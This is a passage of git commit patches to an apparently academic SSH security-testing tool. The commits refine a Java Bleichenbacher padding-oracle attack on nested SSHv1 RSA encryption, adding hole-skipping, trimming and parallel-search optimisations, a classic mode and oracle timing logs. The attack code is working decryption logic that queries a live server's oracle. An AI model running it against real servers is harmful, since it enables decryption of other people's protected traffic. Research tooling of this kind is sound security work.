CustomRsaPublicKey outerKey, + List M) { BigInteger s = lowerBound; boolean oracleResult; + BigInteger j = BigInteger.ONE; + BigInteger low = + ceil( + three_B.add(j.multiply(rsaPublicKey.getModulus())), + M.get(0).lower); // ceil(3*B+j*n,a) + BigInteger high = + ceil( + two_B.add( + (j.add(BigInteger.ONE) + .multiply(rsaPublicKey.getModulus()))), + M.get(0).upper) + .subtract(BigInteger.ONE); // ceil(2*B+(j+1)*n,b)-1 + while (true) { + + if (j.compareTo(BigInteger.ZERO) > 0) { + BigInteger[] result = checkAndSkipS(s, j, low, high, rsaPublicKey, M.get(0)); + s = result[0]; + j = result[1]; + high = result[2]; + low = result[3]; + } + BigInteger attempt = manipulateCiphertext( s, @@ -235,6 +309,60 @@ private BigInteger step2a( } } + private BigInteger[] step2cSingle( + BigInteger lowerBound, + BigInteger upperBound, + BigInteger currentS, + BigInteger r, + byte[] ciphertext, + CustomRsaPublicKey rsaPublicKey, + CustomRsaPublicKey outerKey) { + + boolean oracleResult; + + BigInteger rITimesN = r.multiply(rsaPublicKey.getModulus()); + BigInteger si_upper = ceil(three_B.add(rITimesN), lowerBound); + + LOGGER.info("Startin"); + + while (currentS.compareTo(si_upper) > 0) { + r = r.add(BigInteger.ONE); + rITimesN = r.multiply(rsaPublicKey.getModulus()); + currentS = ceil(two_B.add(rITimesN), upperBound); + si_upper = ceil(three_B.add(rITimesN), lowerBound); + } + + LOGGER.info("having good s"); + + BigInteger attempt = + manipulateCiphertext( + currentS, + rsaPublicKey.getPublicExponent(), + rsaPublicKey.getModulus(), + ciphertext); + + LOGGER.info("Manipulated Successfull"); + + if (outerKey != null) { + BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); + oracleResult = queryOracle(encryptedAttempt, true); + counterInnerBleichenbacher++; + } else { + oracleResult = queryOracle(attempt, false); + counterOuterBleichenbacher++; + } + + LOGGER.info("Querried Oracle"); + + if (oracleResult) { + LOGGER.debug("Successfull"); + return new BigInteger[] {BigInteger.ONE, currentS, r}; + } else { + LOGGER.debug("Failed"); + return new BigInteger[] {BigInteger.ZERO, currentS.add(BigInteger.ONE), r}; + } + } + /** * Searches for a valid s-value in a given range of possible s-values for the inner encryption * of a nested (double encrypted) BB-Attack @@ -259,16 +387,15 @@ private BigInteger step2c( // ri = ceil(2 * (b * prev_s - 2 * B), n) BigInteger bTimesPrevs = upperBound.multiply(previousS); BigInteger bTimePrevsSubTwoB = bTimesPrevs.subtract(two_B); - BigInteger ri = - MathHelper.ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); + BigInteger ri = ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); while (true) { // si_lower = ceil(2 * B + ri * n, b) // si_upper = ceil(3 * B + ri * n, a) BigInteger rITimesN = ri.multiply(rsaPublicKey.getModulus()); - BigInteger si_lower = MathHelper.ceil(two_B.add(rITimesN), upperBound); - BigInteger si_upper = MathHelper.ceil(three_B.add(rITimesN), lowerBound); + BigInteger si_lower = ceil(two_B.add(rITimesN), upperBound); + BigInteger si_upper = ceil(three_B.add(rITimesN), lowerBound); for (BigInteger si = si_lower; si.compareTo(si_upper) < 0; @@ -341,21 +468,21 @@ private List updateInterval( BigInteger lowerTimesS = chosenInterval.lower.multiply(s); BigInteger lowerPartForCeil = lowerTimesS.subtract(three_B_plus_one); - BigInteger r_lower = MathHelper.ceil(lowerPartForCeil, rsaPublicKey.getModulus()); + BigInteger r_lower = ceil(lowerPartForCeil, rsaPublicKey.getModulus()); /* b * s - 2 * B */ BigInteger upperTimesS = chosenInterval.upper.multiply(s); BigInteger upperPartForCeil = upperTimesS.subtract(two_B); - BigInteger r_upper = MathHelper.ceil(upperPartForCeil, rsaPublicKey.getModulus()); + BigInteger r_upper = ceil(upperPartForCeil, rsaPublicKey.getModulus()); for (BigInteger r = r_lower; r.compareTo(r_upper) < 0; r = r.add(BigInteger.ONE)) { BigInteger lowerBound = chosenInterval.lower; BigInteger upperBound = chosenInterval.upper; BigInteger lowerUpperBound = - MathHelper.ceil(two_B.add(r.multiply(rsaPublicKey.getModulus())), s); + ceil(two_B.add(r.multiply(rsaPublicKey.getModulus())), s); lowerBound = lowerBound.max(lowerUpperBound); BigInteger upperUpperBound = @@ -565,10 +692,11 @@ private byte[] Bleichenbacher( s = step2a( - MathHelper.ceil(innerPublicKey.getModulus().add(two_B), M.get(0).upper), + ceil(innerPublicKey.getModulus().add(two_B), M.get(0).upper), ciphertext, innerPublicKey, - outerPublicKey); + outerPublicKey, + M); LOGGER.debug( "found s, initial updating M lower: {} M upper: {}", @@ -580,7 +708,7 @@ private byte[] Bleichenbacher( while (true) { if (M.size() >= 2) { - s = step2b(s.add(BigInteger.ONE), ciphertext, innerPublicKey, outerPublicKey); + s = step2b(M, s.add(BigInteger.ONE), ciphertext, innerPublicKey, outerPublicKey); } else if (M.size() == 1) { BigInteger a = M.get(0).lower; BigInteger b = M.get(0).upper; diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Interval.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Interval.java index 54b279feb..af24f48b0 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Interval.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Interval.java @@ -12,6 +12,22 @@ /** M interval as mentioned in the Bleichenbacher paper. */ public class Interval { + public BigInteger getLower() { + return lower; + } + + public void setLower(BigInteger lower) { + this.lower = lower; + } + + public BigInteger getUpper() { + return upper; + } + + public void setUpper(BigInteger upper) { + this.upper = upper; + } + public BigInteger lower; public BigInteger upper; diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java index 49454b042..e1bfd5938 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java @@ -7,8 +7,6 @@ */ package de.rub.nds.sshattacker.attacks.pkcs1.oracles; -import static de.rub.nds.tlsattacker.util.ConsoleLogger.CONSOLE; - import de.rub.nds.sshattacker.attacks.pkcs1.BleichenbacherWorkflowGenerator; import de.rub.nds.sshattacker.attacks.response.ResponseExtractor; import de.rub.nds.sshattacker.attacks.response.ResponseFingerprint; @@ -42,18 +40,15 @@ public class BleichenbacherOracle extends Pkcs1Oracle { private final int maxAttempts; - private int counter = 0; + long timeElapsedforAverageCalculation = 0; + long timeElapsed = 0; /** * @param hostPublicKey The public key * @param config Config */ public BleichenbacherOracle( - CustomRsaPublicKey hostPublicKey, - CustomRsaPublicKey serverPublicKey, - Config config, - int attemptCounterInnerBleichenbacher, - int attemptCounterOuterBleichenbacher) { + CustomRsaPublicKey hostPublicKey, CustomRsaPublicKey serverPublicKey, Config config) { this.hostPublicKey = hostPublicKey; this.serverPublicKey = serverPublicKey; this.blockSize = @@ -78,17 +73,36 @@ public BleichenbacherOracle( this.maxAttempts = maxAttempts; } + /** + * A "noramle" single encryption PCKS Conformity Check + * + * @param msg Encrypted message to check for conformity + * @return Conformty (True or False) + */ @Override public boolean checkPKCSConformity(final byte[] msg) { return checkPKCSConformity(msg, 0)[0]; } + /** + * A "double" PCKS Conformity check for nested encryption + * + * @param msg Encrypted message to check for conformity + * @return Conformty (True or False) + */ @Override public boolean[] checkDoublePKCSConformity(final byte[] msg) { return checkPKCSConformity(msg, 0); } + /** + * Check for PKCS Conformity with an attempt counter + * + * @param msg Encrypted message to check for conformity + * @param currentAttempt Attempt to check for conformity, use for limiting attempts + * @return + */ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { // we are initializing a new connection in every loop step, since most // of the known servers close the connection after an invalid handshake @@ -103,13 +117,26 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { WorkflowExecutor workflowExecutor = new DefaultWorkflowExecutor(state); numberOfQueries++; - if (numberOfQueries % 250 == 0) { - CONSOLE.info("Number of queries so far: {}", numberOfQueries); + if (numberOfQueries % 500 == 0) { + LOGGER.warn( + String.format( + "[%d] Tries, took per average %f ms per oracle-request, in total %s ms have gone by", + numberOfQueries, + (timeElapsedforAverageCalculation / (double) 500), + timeElapsed), + numberOfQueries, + (timeElapsedforAverageCalculation / 500), + timeElapsed); + timeElapsedforAverageCalculation = 0; } boolean conform[] = {false, false}; try { + long start = System.currentTimeMillis(); workflowExecutor.executeWorkflow(); + long finish = System.currentTimeMillis(); + timeElapsedforAverageCalculation = timeElapsedforAverageCalculation + (finish - start); + timeElapsed = timeElapsed + (finish - start); ProtocolMessage lastMessage = receiveOracleResultAction.getReceivedMessages().get(0); LOGGER.debug("Received: {}", lastMessage.toString()); @@ -132,8 +159,7 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { throw new WorkflowExecutionException("Workflow did not execute as planned!"); } - counter++; - LOGGER.info("Try #{} ", counter); + LOGGER.warn("Try #{} took {}ms to query oracle", numberOfQueries, (finish - start)); // clearConnections(state); } catch (WorkflowExecutionException e) { diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java index c525cfcae..df4517a82 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java @@ -63,6 +63,7 @@ public Ssh1MockOracle( int counter = 0; long timeElapsed = 0; + long timeElapsedforAverageCalculation = 0; /** * Check the given content for PKCS-Conformity @@ -84,10 +85,14 @@ private boolean[] oracleStrong(byte[] msg) { LOGGER.info( String.format( "[%d] Tries, took per average %f ms per oracle-request, in total %s ms have gone by", - counter, (timeElapsed / (double) counter), timeElapsed), + counter, + (timeElapsedforAverageCalculation / (double) 500), + timeElapsed), counter, - (timeElapsed / counter), + (timeElapsedforAverageCalculation / 500), timeElapsed); + + timeElapsedforAverageCalculation = 0; } if (isPlaintextOracle) { return new boolean[] {true, true}; @@ -128,6 +133,7 @@ private boolean[] oracleStrong(byte[] msg) { long finish = System.currentTimeMillis(); timeElapsed = timeElapsed + (finish - start); + timeElapsedforAverageCalculation = timeElapsedforAverageCalculation + (finish - start); return oracleResult; } @@ -136,14 +142,19 @@ private boolean[] oracleStrong(byte[] msg) { private boolean[] oracleWeak(byte[] msg) { boolean[] oracleResult = new boolean[] {false, false}; counter++; + if (counter % 500 == 0) { LOGGER.info( String.format( "[%d] Tries, took per average %f ms per oracle-request, in total %s ms have gone by ", - counter, (timeElapsed / (double) counter), timeElapsed), + counter, + (timeElapsedforAverageCalculation / (double) 500), + timeElapsed), counter, - (timeElapsed / counter), + (timeElapsedforAverageCalculation / 500), timeElapsed); + + timeElapsedforAverageCalculation = 0; } long start = System.currentTimeMillis(); @@ -193,11 +204,15 @@ private boolean[] oracleWeak(byte[] msg) { } long finish = System.currentTimeMillis(); timeElapsed = timeElapsed + (finish - start); + timeElapsedforAverageCalculation = + timeElapsedforAverageCalculation + (finish - start); return oracleResult; } catch (IllegalBlockSizeException | BadPaddingException e) { long finish = System.currentTimeMillis(); timeElapsed = timeElapsed + (finish - start); + timeElapsedforAverageCalculation = + timeElapsedforAverageCalculation + (finish - start); return oracleResult; } catch (InvalidKeyException | NoSuchAlgorithmException | InvalidKeySpecException e) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java index eaae894af..63315b74a 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java @@ -36,6 +36,9 @@ public class GeneralDelegate extends Delegate { @Parameter(names = "-info", description = "Info output (sets logLevel to INFO)") private boolean info; + @Parameter(names = "-warn", description = "Info output (sets logLevel to warn)") + private boolean warn; + public GeneralDelegate() {} public boolean isHelp() { @@ -69,6 +72,8 @@ public void applyDelegate(Config config) { Configurator.setAllLevels("de.rub.nds.sshattacker", Level.DEBUG); } else if (info) { Configurator.setAllLevels("de.rub.nds.sshattacker", Level.INFO); + } else if (warn) { + Configurator.setAllLevels("de.rub.nds.sshattacker", Level.WARN); } else if (quiet) { Configurator.setAllLevels("de.rub.nds.sshattacker", Level.OFF); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java index 38c76e544..bddde07cc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java @@ -24,7 +24,7 @@ public static AbstractCipher getCipher(EncryptionAlgorithm encryptionAlgorithm, public static AbstractCipher getCipher( EncryptionAlgorithm encryptionAlgorithm, byte[] key, boolean mainCipher) { - LOGGER.info("Getting Cipher {}", encryptionAlgorithm.toString()); + LOGGER.debug("Getting Cipher {}", encryptionAlgorithm.toString()); if (encryptionAlgorithm == EncryptionAlgorithm.NONE) { return new NoneCipher(); } else if (mainCipher @@ -33,7 +33,7 @@ public static AbstractCipher getCipher( // instance used for header encryption / decryption return new ChaCha20Poly1305Cipher(key); } else if (encryptionAlgorithm == EncryptionAlgorithm.TRIPLE_DES_CBC) { - LOGGER.info("Getting Cipher {}", encryptionAlgorithm.toString()); + LOGGER.debug("Getting Cipher {}", encryptionAlgorithm.toString()); return new TribleDESCipher(key); } else if (encryptionAlgorithm.getJavaName() != null) { return new JavaCipher( From d6dfa3dcab46981eb3cea10c6846e295954cbc4a Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 11 Feb 2024 01:40:50 +0100 Subject: [PATCH 132/176] commenting --- .../attacks/pkcs1/Bleichenbacher.java | 91 ++++++++++++++----- 1 file changed, 70 insertions(+), 21 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 69081e092..138fa9a43 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -20,7 +20,6 @@ import java.util.ArrayList; import java.util.Arrays; import java.util.List; -import java.util.concurrent.*; import javax.crypto.BadPaddingException; import javax.crypto.Cipher; import javax.crypto.IllegalBlockSizeException; @@ -91,6 +90,8 @@ private BigInteger manipulateCiphertext(BigInteger s, BigInteger e, BigInteger n * Searches the smallest suitable s-value for the inner encryption of a nested (double * encrypted) BB-Attack. * + *

Implements Step 2b without parallel threats + * * @param lowerBound The smallest value where it makes sens to start searching * @param ciphertext the ciphertext which should be checked against * @param rsaPublicKey the public-key to the ciphertext, which should be used to encrypt @@ -143,21 +144,30 @@ private BigInteger step2b( } } + /** + * Generates the state for the Bleichenbacher attack Step 2B with single Calls to 2C. + * + * @param M The intervals as mentioned in the Bleichenbacher paper. + * @param previousS The previous value of 's' used in the attack. + * @param rsaPublicKey The RSA public key used in the attack. + * @return The state as an ArrayList of arrays of BigIntegers. + */ private ArrayList genState( List M, BigInteger previousS, CustomRsaPublicKey rsaPublicKey) { - // Arrayliste aus einem array Bigintegers - + // Saving s and r in States ArrayList state = new ArrayList<>(); - // für jedes M - for (Interval interval : M) { - BigInteger upperBound = interval.getUpper(); + for (Interval chosenInterval : M) { + BigInteger upperBound = chosenInterval.getUpper(); BigInteger bTimesPrevS = upperBound.multiply(previousS); BigInteger bTimePrevsSubTwoB = bTimesPrevS.subtract(two_B); + // r = ceil(2 * b * (s-1) - 2B, n) BigInteger ri = ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); BigInteger rITimesN = ri.multiply(rsaPublicKey.getModulus()); + + // s = ceil(2B + r*n, b) BigInteger si_lower = ceil(two_B.add(rITimesN), upperBound); state.add(new BigInteger[] {si_lower, ri}); } @@ -165,6 +175,17 @@ private ArrayList genState( return state; } + /** + * Searches the smallest suitable s-value for the inner encryption of a nested (double + * encrypted) BB-Attack. + * + *

Implements Step 2b parallel threats improvement from klima + * + * @param ciphertext the ciphertext which should be checked against + * @param rsaPublicKey the public-key to the ciphertext, which should be used to encrypt + * @param outerKey the rsa-public-key for the outer encryption, encrypting the generated s-value + * @return the smallest s-value, which generates a valid PKCS#1 Ciphertext + */ private BigInteger step2b( List M, BigInteger previousS, @@ -175,27 +196,31 @@ private BigInteger step2b( LOGGER.info("the array has {} items", M.size()); - ArrayList states = new ArrayList<>(); + ArrayList states; states = genState(M, previousS, rsaPublicKey); while (true) { - // für jedes M nach index for (int i = 0; i < M.size(); i++) { - LOGGER.info("running in {}", i); - BigInteger a = M.get(i).lower; - BigInteger b = M.get(i).upper; + BigInteger lower = M.get(i).lower; + BigInteger upper = M.get(i).upper; + + // reading saved values from state BigInteger currentS = states.get(i)[0]; BigInteger r = states.get(i)[1]; + + // running a single 2c step and get result as array BigInteger[] results = - step2cSingle(a, b, currentS, r, ciphertext, rsaPublicKey, outerKey); + step2cSingle(lower, upper, currentS, r, ciphertext, rsaPublicKey, outerKey); BigInteger success = results[0]; currentS = results[1]; r = results[2]; if (success.compareTo(BigInteger.ONE) == 0) { + // return s because of correct s value return currentS; } else { + // Save back state states.get(i)[0] = currentS; states.get(i)[1] = r; } @@ -224,6 +249,7 @@ private BigInteger[] checkAndSkipS( if (s.compareTo(low) >= 0 && s.compareTo(high) <= 0) { s = high.add(BigInteger.ONE); } else if (low.compareTo(high) > 0) { + LOGGER.info("thats it - no more holes"); return new BigInteger[] {s, BigInteger.ZERO, BigInteger.ZERO, BigInteger.ZERO}; } else if (s.compareTo(low) < 0) { return new BigInteger[] {s, j, high, low}; @@ -237,9 +263,22 @@ private BigInteger[] checkAndSkipS( .multiply(publicKey.getModulus()))), M.upper) .subtract(BigInteger.ONE); // ceil(2*B+(j+1)*n,b)-1 + + LOGGER.info("Skipping {} Values", high.subtract(low).intValue()); } } + /** + * Perform the step 2a of the Bleichenbacher Attack inkl. Skipping holes and Trimming + * improvements from Bardou. + * + * @param lowerBound the lower bound value + * @param ciphertext the ciphertext to manipulate + * @param rsaPublicKey the RSA public key + * @param outerKey the outer key + * @param M the list of intervals + * @return the final result of step 2a + */ private BigInteger step2a( BigInteger lowerBound, byte[] ciphertext, @@ -251,17 +290,16 @@ private BigInteger step2a( boolean oracleResult; BigInteger j = BigInteger.ONE; - BigInteger low = - ceil( - three_B.add(j.multiply(rsaPublicKey.getModulus())), - M.get(0).lower); // ceil(3*B+j*n,a) + // ceil(3*B+j*n,a) + BigInteger low = ceil(three_B.add(j.multiply(rsaPublicKey.getModulus())), M.get(0).lower); + + // ceil(2*B+(j+1)*n,b)-1 BigInteger high = ceil( - two_B.add( - (j.add(BigInteger.ONE) - .multiply(rsaPublicKey.getModulus()))), - M.get(0).upper) - .subtract(BigInteger.ONE); // ceil(2*B+(j+1)*n,b)-1 + two_B.add((j.add(BigInteger.ONE).multiply(rsaPublicKey.getModulus()))), + M.get(0).upper); + + high = high.subtract(BigInteger.ONE); while (true) { @@ -309,6 +347,17 @@ private BigInteger step2a( } } + /** + * Searches for a valid s-value as part of the paralle threats method from klima, pretending only + * one interval was found to search for the next s-value + * + * @param lowerBound the lower bound for the possible s-values + * @param upperBound the upper boud for the possible s-values + * @param ciphertext the ciphertext, for which the s-values should be found + * @param rsaPublicKey the public-key for which the s-values should be found + * @param outerKey the outer encryption key + * @return + */ private BigInteger[] step2cSingle( BigInteger lowerBound, BigInteger upperBound, From 7cc3bdd93223d60ca3c97814c0366bfc5eaa0b52 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 11 Feb 2024 13:20:54 +0100 Subject: [PATCH 133/176] fixing -classic tag --- .../attacks/pkcs1/Bleichenbacher.java | 76 ++++++++++++------- 1 file changed, 47 insertions(+), 29 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 138fa9a43..de66f1177 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -50,6 +50,8 @@ public class Bleichenbacher extends Pkcs1Attack { private int innerTrimmers = 1500; private int outerTrimmers = 500; + private boolean classic = false; + /** * @param msg The message that should be decrypted with the attack * @param pkcsOracle The oracle to be queried @@ -288,27 +290,31 @@ private BigInteger step2a( BigInteger s = lowerBound; boolean oracleResult; + BigInteger high = null, low = null, j = BigInteger.ONE; - BigInteger j = BigInteger.ONE; - // ceil(3*B+j*n,a) - BigInteger low = ceil(three_B.add(j.multiply(rsaPublicKey.getModulus())), M.get(0).lower); + if (!classic) { + // ceil(3*B+j*n,a) + low = ceil(three_B.add(j.multiply(rsaPublicKey.getModulus())), M.get(0).lower); - // ceil(2*B+(j+1)*n,b)-1 - BigInteger high = - ceil( - two_B.add((j.add(BigInteger.ONE).multiply(rsaPublicKey.getModulus()))), - M.get(0).upper); + // ceil(2*B+(j+1)*n,b)-1 + high = + ceil( + two_B.add((j.add(BigInteger.ONE).multiply(rsaPublicKey.getModulus()))), + M.get(0).upper); - high = high.subtract(BigInteger.ONE); + high = high.subtract(BigInteger.ONE); + } while (true) { - - if (j.compareTo(BigInteger.ZERO) > 0) { - BigInteger[] result = checkAndSkipS(s, j, low, high, rsaPublicKey, M.get(0)); - s = result[0]; - j = result[1]; - high = result[2]; - low = result[3]; + // only skip holes in improved version + if (!classic) { + if (j.compareTo(BigInteger.ZERO) > 0) { + BigInteger[] result = checkAndSkipS(s, j, low, high, rsaPublicKey, M.get(0)); + s = result[0]; + j = result[1]; + high = result[2]; + low = result[3]; + } } BigInteger attempt = @@ -348,8 +354,8 @@ private BigInteger step2a( } /** - * Searches for a valid s-value as part of the paralle threats method from klima, pretending only - * one interval was found to search for the next s-value + * Searches for a valid s-value as part of the paralle threats method from klima, pretending + * only one interval was found to search for the next s-value * * @param lowerBound the lower bound for the possible s-values * @param upperBound the upper boud for the possible s-values @@ -551,18 +557,18 @@ private List updateInterval( /** The function to start the Attack */ public void attack(boolean classic) { + this.classic = classic; + if (hostPublicKey.getModulus().bitLength() > serverPublicKey.getModulus().bitLength()) { byte[] cracked = - nestedBleichenbacher( - encryptedMsg, this.serverPublicKey, this.hostPublicKey, classic); + nestedBleichenbacher(encryptedMsg, this.serverPublicKey, this.hostPublicKey); LOGGER.info("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); byte[] cracked_decoded = pkcs1Decode(cracked); LOGGER.info("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); solution = new BigInteger(cracked_decoded); } else { byte[] cracked = - nestedBleichenbacher( - encryptedMsg, this.serverPublicKey, this.hostPublicKey, classic); + nestedBleichenbacher(encryptedMsg, this.serverPublicKey, this.hostPublicKey); LOGGER.info("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); byte[] cracked_decoded = pkcs1Decode(cracked); LOGGER.info("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); @@ -582,8 +588,7 @@ public void attack(boolean classic) { private byte[] nestedBleichenbacher( byte[] ciphertext, CustomRsaPublicKey innerPublicKey, - CustomRsaPublicKey outerPublicKey, - boolean classic) { + CustomRsaPublicKey outerPublicKey) { int innerBitsize = innerPublicKey.getModulus().bitLength(); int outerBitsize = outerPublicKey.getModulus().bitLength(); int innerK = innerBitsize / 8; @@ -595,7 +600,7 @@ private byte[] nestedBleichenbacher( three_B_sub_one = three_B.subtract(BigInteger.ONE); three_B_plus_one = three_B.add(BigInteger.ONE); - byte[] encoded_inner_ciphertext = Bleichenbacher(ciphertext, outerPublicKey, null, classic); + byte[] encoded_inner_ciphertext = Bleichenbacher(ciphertext, outerPublicKey, null); byte[] innerCiphertext = pkcs1Decode(encoded_inner_ciphertext); B = big_two.pow(8 * (innerK - 2)); @@ -604,7 +609,7 @@ private byte[] nestedBleichenbacher( three_B_sub_one = three_B.subtract(BigInteger.ONE); three_B_plus_one = three_B.add(BigInteger.ONE); - return Bleichenbacher(innerCiphertext, innerPublicKey, outerPublicKey, classic); + return Bleichenbacher(innerCiphertext, innerPublicKey, outerPublicKey); } private List trimM0( @@ -710,8 +715,7 @@ private List trimM0( private byte[] Bleichenbacher( byte[] ciphertext, CustomRsaPublicKey innerPublicKey, - CustomRsaPublicKey outerPublicKey, - boolean classic) { + CustomRsaPublicKey outerPublicKey) { int innerBitsize = innerPublicKey.getModulus().bitLength(); int innerK = innerBitsize / 8; @@ -733,6 +737,8 @@ private byte[] Bleichenbacher( "M lower: {} M upper: {}", M.get(0).lower.toString(16), M.get(0).upper.toString(16)); + + // only applie trimmes in improved run if (!classic) { int maxTrimmes = outerPublicKey != null ? innerTrimmers : outerTrimmers; @@ -757,7 +763,19 @@ private byte[] Bleichenbacher( while (true) { if (M.size() >= 2) { - s = step2b(M, s.add(BigInteger.ONE), ciphertext, innerPublicKey, outerPublicKey); + + if (!classic) { + s = + step2b( + M, + s.add(BigInteger.ONE), + ciphertext, + innerPublicKey, + outerPublicKey); + } else { + s = step2b(s.add(BigInteger.ONE), ciphertext, innerPublicKey, outerPublicKey); + } + } else if (M.size() == 1) { BigInteger a = M.get(0).lower; BigInteger b = M.get(0).upper; From c14d31b4f28511105e1e894cf204cc4c544b5b86 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 17 Feb 2024 15:06:47 +0100 Subject: [PATCH 134/176] Comment out unused code block in MessageIdConstantSSH1 --- .../nds/sshattacker/core/constants/MessageIdConstantSSH1.java | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java index 51460639b..b4d444f69 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java @@ -106,7 +106,7 @@ public static MessageIdConstantSSH1 fromId(byte id, Context context) { LOGGER.warn("Unknonw Message-ID: {}", id); throw new ParserException("Unable to parse message with unknown id"); } - if (id >= (byte) 30 && id <= (byte) 49) { + /*if (id >= (byte) 30 && id <= (byte) 49) { KeyExchangeAlgorithm kexInContext = context.getChooser().getKeyExchangeAlgorithm(); for (MessageIdConstantSSH1 candidate : idList) { if (Arrays.asList(candidate.specificTo).contains(kexInContext.getFlowType())) { @@ -129,7 +129,7 @@ public static MessageIdConstantSSH1 fromId(byte id, Context context) { } throw new ParserException( "Unable to parse user authentication specific message in the current context"); - } + }*/ return idList.get(0); } } From de6752d0e013434a61f89e5e69daa0ca058848b4 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 17 Feb 2024 22:02:10 +0100 Subject: [PATCH 135/176] fixing log-level --- .../sshattacker/core/config/delegate/GeneralDelegate.java | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java index 63315b74a..70c921ed1 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java @@ -69,13 +69,13 @@ public void setQuiet(boolean quiet) { public void applyDelegate(Config config) { Security.addProvider(new BouncyCastleProvider()); if (isDebug()) { - Configurator.setAllLevels("de.rub.nds.sshattacker", Level.DEBUG); + Configurator.setAllLevels("de.rub.nds", Level.DEBUG); } else if (info) { - Configurator.setAllLevels("de.rub.nds.sshattacker", Level.INFO); + Configurator.setAllLevels("de.rub.nds", Level.INFO); } else if (warn) { - Configurator.setAllLevels("de.rub.nds.sshattacker", Level.WARN); + Configurator.setAllLevels("de.rub.nds", Level.WARN); } else if (quiet) { - Configurator.setAllLevels("de.rub.nds.sshattacker", Level.OFF); + Configurator.setAllLevels("de.rub.nds", Level.OFF); } LOGGER.debug("Using the following security providers"); for (Provider p : Security.getProviders()) { From 29e18c377760553c1cbff4a6a55369933dffaa0f Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 18 Feb 2024 00:25:57 +0100 Subject: [PATCH 136/176] fixing Merge Master into SSHv1 Branch --- .../attacks/impl/BleichenbacherAttacker.java | 2 +- .../attacks/pkcs1/oracles/Ssh1MockOracle.java | 4 +- .../nds/sshattacker/core/config/Config.java | 9 ++-- .../WorkflowExecutionException.java | 4 -- .../core/layer/context/SshContext.java | 2 +- .../core/packet/cipher/PacketCipher.java | 2 +- .../packet/layer/AbstractPacketLayer.java | 0 .../core/packet/layer/PacketLayerFactory.java | 0 .../packet/layer/PacketLayerParseResult.java | 0 .../UserAuthSuccessMessageHandler.java | 30 +++++++------- 